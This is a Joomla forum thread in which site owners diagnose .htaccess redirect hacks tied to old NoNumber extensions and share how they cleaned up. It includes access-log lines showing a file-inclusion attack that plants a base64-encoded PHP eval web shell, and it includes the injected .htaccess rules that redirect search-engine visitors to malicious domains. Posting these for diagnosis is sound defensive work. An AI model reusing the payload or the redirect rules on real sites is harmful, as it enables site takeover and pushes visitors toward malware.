Joomla .htaccess hacked to xxx.ru

[MoonfireArt]

... but it's important that NoNumber Framework extension (-set) is listed there in VEL, as the previus versions are know to have not one but several vulnerabilities, both LFI and RFI. Unfortunately, NoNumber is listed in most of the exploits-data sites so it's vulerability is well documented and now used as a good target for malware-seeding attacks. The additional problem with NoNumber is that the components which are using it are easy to spot via simple googlesweep or pintests on J! installations...

That sucks! Those extensions (and that Framework) saved me hours of coding. I would hate to think that I now have to change it all (Tabber and Slider are used extensively throughout the sites). A question though, since we do not have registered users or anyway for people to post any information, would that lessen the vulnerability to these attacks?

Also, a warning to everyone. It seems these same hackers/spammers are now infiltrating Yahoo mail accounts. A company employee recently had her account and contact list hijacked to send out spam e-mails from her account to some of the same sites these redirects are going to. As I am sure Yahoo! takes it's security very seriously, it just goes to show that anyone can be vulnerable. Step up your e-mail precautions!

[mandville]

A question though, since we do not have registered users or anyway for people to post any information, would that lessen the vulnerability to these attacks?

in short, no.

Also, a warning to everyone. It seems these same hackers/spammers are now infiltrating Yahoo mail accounts.

slightly irrelevant to these discussions, as they have been attacking email accounts for years

[shwaran]

... but it's important that NoNumber Framework extension (-set) is listed there in VEL, as the previus versions are know to have not one but several vulnerabilities, both LFI and RFI. Unfortunately, NoNumber is listed in most of the exploits-data sites so it's vulerability is well documented and now used as a good target for malware-seeding attacks. The additional problem with NoNumber is that the components which are using it are easy to spot via simple googlesweep or pintests on J! installations...

with in my experience Nonumber framework and extension are vulnerabilities.

here is my websites details

website - 1
Joomla! 2.5.4
obrss
J2XML Importer
JA News Pro Module
Lof ArticlesSlideShow Module
Content - 1Pixelout Audio Player

website - 2
Joomla! 2.5.4
obrss
J2XML Importer
JA News Pro Module
Lof ArticlesSlideShow Module
Content - 1Pixelout Audio Player
no number Advanced Module Manager
no number cache cleaner

website 2 only hacked and changed the .htaccess

[Webdongle]

...
with in my experience Nonumber framework and extension are vulnerabilities.
...

website 2 only hacked and changed the .htaccess

What version of Advanced module manager was on 'site 2' ? The version with the known vulnerabilities ?

[Ace__]

Had me server hacked last week. Joomla 1.5.22. Seems to have been the NoNumber plugin that opened the door in my case too...

From the access.logs (IP of attacker and my domain hidden)

Code: Select all

XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:28 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:29 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:30 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:31 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:32 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:33 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/environ%00.inc.php HTTP/1.1" 200 3926 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:36 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2fproc/self/fd/8%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:38 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/fd/8%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:39 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/fd/8%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:40 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/fd/8%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:41 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/fd/8%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:43 +0100] "GET /index.php?nn_qp=1&file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fproc/self/fd/8%00.inc.php HTTP/1.1" 200 2743 "-" "Mozilla/5.0 <?file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:44 +0100] "POST /tmp/j.php HTTP/1.1" 200 9 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1) Gecko/20110403 Firefox/3.6a1pre" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:45 +0100] "POST /tmp/j.php HTTP/1.1" 200 - "-" "Mozilla/4.0 (Linux; Windows NT 5.0; ja; rv:2)" www.mydomain.ie
XXX.XXX.XXX.XXX - - [03/Apr/2012:22:44:47 +0100] "GET /tmp/jos_almi.php HTTP/1.1" 200 56803 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; ja; rv:1.9.2a1pre) Gecko/20090403 Firefox/3.6a1pre" www.mydomain.ie

So basically it placed a j.php file in the tmp folder and then a jos_almi.php file and from these created or overwrote a .htaccess file in every first level directory.

I've updated all sites to 1.5.26 but I think I will not use NoNumber in future (it was only for Admin Bar Docker).

[shwaran]

...
with in my experience Nonumber framework and extension are vulnerabilities.
...

website 2 only hacked and changed the .htaccess

What version of Advanced module manager was on 'site 2' ? The version with the known vulnerabilities ?

Advanced Module Manager 2.4.2

there are updated version of this module is available how ever for me i don't risk to install this extension again

[Bernard T]

Joomla 1.5.22. Seems to have been the NoNumber plugin that opened the door in my case too...
From the access.logs

Code: Select all

......[b] /index.php?nn_qp=1[/b] ...

That's the earlier mentioned query string that makes your Joomlas so easy targets. Just one Google search and there is the list of possible "sitting ducks"

@ Mandville & PhilD ... since evidence is more and more clear that old NoNumber extensions are one of the main targets, would it be possible that you make a special note in VEL about it, something like:

"because of high number of attacks using old vulnerable versions of NoNumber extensions, it is strongly advised that you immediately upgrade your old NoNumber extension to the newest available version"

Many people with hijacked sites go to VEL, through the list, but "white" background could be misleading and the over-jump it in hurry of situation in which they are...

[mandville]

Not all sites have nonumber extensions installed.
Have those who do have nonumber installed spoken to the developer.
The reasoning and notes on the nonumber entries have beenmade clear as to the date and version of the extensions involved. for practical reasons, the vel list is not updated with every new version.

[mandville]

Had me server hacked last week. Joomla 1.5.22. Seems to have been the NoNumber plugin that opened the door in my case too...

It could also have been your out of date instal. Please contact the developer with your concerns telling them the full system setup with versioning of joomla and the extension

[Bernard T]

VED suggestion - OK!

Had me server hacked last week. Joomla 1.5.22. Seems to have been the NoNumber plugin that opened the door in my case too...

It could also have been your out of date instal. ...

well Mandville , the copy of the log that Ace__ presented here is undoubtedly clear - the file is being inserted with NoNumber method, here, at this point :

From the access.logs ...

Code: Select all

 <? file_put_contents('tmp/j.php',base64_decode('PD9ldmFsKHN0cmlwc2xhc2hlcyhhcnJheV9wb3AoJF9QT1NUKSkpOz8+'));?>"

[Webdongle]

.... the copy of the log that Ace__ presented here is undoubtedly clear - the file is being inserted with NoNumber method,...

But what version of nonumber was it the version that is known to be vulnerable or the one that is said not to be vulnerable ?

If the former then it does not prove nonumber is still vulnerable and is old news. But if the latter then it is significant.

[mandville]

i have requested that no_number make an appearance here, note i did say that not all users had "no number" extensions.
Its also nice for the devs to inform both jed and vel on any security releases they make

[Bernard T]

i have requested that no_number make an appearance here, note i did say that not all users had "no number" extensions.
Its also nice for the devs to inform both jed and vel on any security releases they make

An excellent idea! That might be clarifying for both sides...

[Ace__]

The NoNumber Elements plugin I was using was 2.2.2 (Feb 2011). I believe the current version is 3.0.2. Incidentally the NoNumber RSS feed on VED is returning a 404.

I believe the exploit was discovered on Oct 10th 2011 and fixed on Oct 17th 2011. (Source)

Would this have meant that NoNumbers listing on VED would have gone RED and then WHITE within a few days?? What is the difference between white and green listings in VED? It does not say. The wording that is there does not read well (and I am a native English speaker).

[PhilD]

The nonumber CustoMenu updated version works now and so check back at the developers website to see if you still get the 404 error.

I have seen some extensions accessed in November 2011, and then nothing happened hack wise until March this year.

VEL
Red- bad version(s) not fixed, Blue - Good -updated and fixed, No Color- Talk to the Developer.

[mcsmom]

I have spoken with someone who is at a big host who reports that 30/30 sites with this hack have some variation of extplorer installed (ninjaexplorer, joomlaextplorer etc). Do people in this thread have either those extensions or similar installed?

[PhilD]

Don't be to quick to blame a file manager extension especially if it is an up to date version. If access is gained to a site one of the things that sometimes happen is a file manager extension is installed to assist the hacker with adding files and changing things on your site. You have to find out if and or when the file manager got installed. Many times people will have no clue about what their site actually contains, so it can be rather difficult to figure out when the file manger got there.

[X-Bit]

Hello @all!

After such an attack I restored a site by scanning / cleaning it thourghly. As I am quite experienced in doing this work I am quite sure there is no (known) threat anymore. It is now some 2 weeks ago and no malicous alteration has been reported since then.

The only thing, as I already asked, is that some users receive timeouts and are unable to reach the site, not depending on high- or low traffic hours. If they try to access the site appending the /index.php they gain instantly access.

I would like to know if somebody encountered the same problem.

Just for the records, customer had old eXtplorer and some actual NoNumber extensions on his site. Joomla version was 1.5.26. Unfortunately Logs had been disabled on his server, which I corrected for future analysis.

[Ace__]

some users receive timeouts and are unable to reach the site.

If they visited your site while the hack was active they will need to clear their cookies and browser cache before being able to visit your site again. The malicious redirect also placed a malicious cookie on visiting machines.

[Bernard T]

some users receive timeouts and are unable to reach the site.

If they visited your site while the hack was active they will need to clear their cookies and browser cache before being able to visit your site again. The malicious redirect also placed a malicious cookie on visiting machines.

Yes, exactly. As there were webserver (apache) generated HTTP redirects used (301 - permanent), today's browsers tend to cache this redirects and thats why...

[X-Bit]

Thats true! I forgott about this one, saw it on my system but did not thought about it anymore... Thanks for pointing me to the right direction!

[frankgill]

I have been hacked and have found the offending file to be .htaccess and so I deleted it and then went to a joomla pack I had on my hard drive to see if I could get the origional .htaccess file but all I found was the htaccess.txt file. If I can find the .htaccess (HTACCESS FILE extention) I hope that when I upload to my directory the problem will be solved.

Has anyone a .htaccess (HTACCESS file extent) for joomla 1.5.23 that they can share. I have tried to rename the htacess.txt file but if will not let me. I have tried explore extention and the akeeba wizard to unzipo my back up and locate the file but I can not find the file in the backup file. I do not wnat to do a full backup as yet as I do not know when I was hacked!!! (I know - long story)

[joomlovenow]

just rename the htaccess.txt file to .htaccess and upload it to your server.

[mandville]

previous 2 posts merged to this topic

just rename the htaccess.txt file to .htaccess and upload it to your server.

whitewash! its not as simple as that , so perhaps follow the sticky called "before you post, read this" and other advice in this forum

[yaanimai]

BernardT,

I downloaded the script you posted, unzipped it & uploaded the 3 files to the root directory of my site but when I browse to http://www.mysite.com/jamss-0.1.2.php it runs for several minutes then it redirects to this page

http://www. xxxxx . ru/ in.cgi?4 (added spaces & x's so as not to post link to malicious site)

Am I doing something wrong?

[PhilD]

Your site is hacked and you are going to have to at minimum delete any files within the Joomla /tmp directory (a most likely place) and correct the .htaccess file. Until the htaccess file is corrected and the hack that is modifying the htaccess file is removed, you will continue to be redirected to malware sites when requesting anything on your site. The .htaccess files are parsed by the server before any other site file is, so you can never reach the script while the htaccess file has the malware code in it. If you remove this code without removing the hack files the redirect code will be put back upon first site access.

[Wrinasellers]

Hello to all A little help Please.

My site is being redirected.
I have changed the file permission -(per my server ad - godaddy to 705).
I have deleted the added script at the top and bottom of the page i all the .htaccess files.:: and when I remove them - they reappear in all my main directories .htaccess for common Joomla directory files only. (Directories that I have created that are not attacked.
THE TOP CODE:::
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu||web-archiv)\.(.*) RewriteRule ^(.*)$ http://pin-se.xx/acu?11 [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ http://pin-se.xx/acu?11 [R=301,L] </IfModule>

THE BOTTOM CODE:::
ErrorDocument 400 http://pin-Se.xx/acu?11 ErrorDocument 401 http://pin-se.xx/acu?11 ErrorDocument 403 http://pin-se.xx/acu?11ErrorDocument 404 http://pin-se.xx/acu?11 ErrorDocument 500 http://pin-se.xx/acu?11
THE CODE CONTINUOUSLY REAPPEAR EVEN IF DELETED FROM MAIN htaccess.

Apparently this is arunning script in one of my joomla product downloads...Anyhelp???

thanks so much

Wrina

[mandville]

my first offer of help would be to use the forum search . there you will find a major discussion on this hack.
I was going to link to the topic but will just merge this postonto the end of it.
I suggest you read ALL the information in the posts for how to deal with these (and similar hacks)

[Wrinasellers]

If you have this Error below in your .htaccess files it is going to take some work on your part. Steps I took to solve the problem are at the end of the code below::

There are two codes, this one is at the top... there is another code at the bottom of the .htaccess files. Click/hold and scan to see them -- they are to the far right
<IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo||allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ http://air-sas.xx/space?7 [R=301,L] RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|x|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) RewriteRule ^(.*)$ http://air-sas.xx/space?7 [R=301,L] </IfModule>

Steps
1) I upgraded from Joomla 1.5.25 to 1.5.26
2) Called Godaddy(ISP) they had to go above my root directory to disable the affected .htacces file.
3) I had to delete all the .htaccess files from all my Directories (Joomla 1st level Directories were the only ones effected) . If you can not delete all your .htaccess files this will not work for you. Deleting just the code does not work. (i tried this twice before i learned this)

4) Delete modules that you are unsure about.

4) Clear your ISP hosted temp files/ backups / cache of all .htaccess . or else all the htaccess files will be rewritten...again and again.

5) If you have stored any zip files from your modules/plugin/comp on your server - place them somewhere else - because I have yet to figure out which module actually has the script in it.

6) Clear your browser history and look again for the redirects.
Check firefox (upgrade)... google worked fine but firefox was affected and rerouting the script's calls to: air-sas.xx and sasrep.xx.....

7) Call your server ISP after you have cleared everything, and ask them to recheck the upper root directory to make sure the corrupted .htaccess file has not been reactivated (if you are on shared hosting )

It took me three attempts... to make sure i cleared all the .htaccess files... if you leave one you leave yourself open...

I do not know if other ISP are being affected -

Time Investment to fix:: 9am to 7:43 --- All Day
& 4 calls to godaddy - They were very helpful.

Good Luck!!!

[HollyK]

Similar thing has happened to my site.
The site appeared fine to me as I always had it bookmarked and went straight to it via that but it was brought to my attention by a member who googled my site and entered via its google link..or should i say tried to enter. Upon clciking the google listing for my site it took him to a russian page whereupon it tried to begin installing a trojan.

I contacted my hosting company and they immediately did a clean install...wiped everything.
I did have a back up but unfortnately when i installed it using kickstart ( great app btw) the same thing happened.
The hosting comp - did another clean install.

So I have now ran the backup on my local machine and everything appears fine as it did before, though the problem is obviously when its set live that the same thing will probably happen when someone googles my site and enters that way.

What can I do to find the malicious code now that I have it running via XAMPP on my local machine.

PS: i looked over the htaccess file and it doesn't appear to have anything out of the ordinary in it.

Thanks in advance.
HK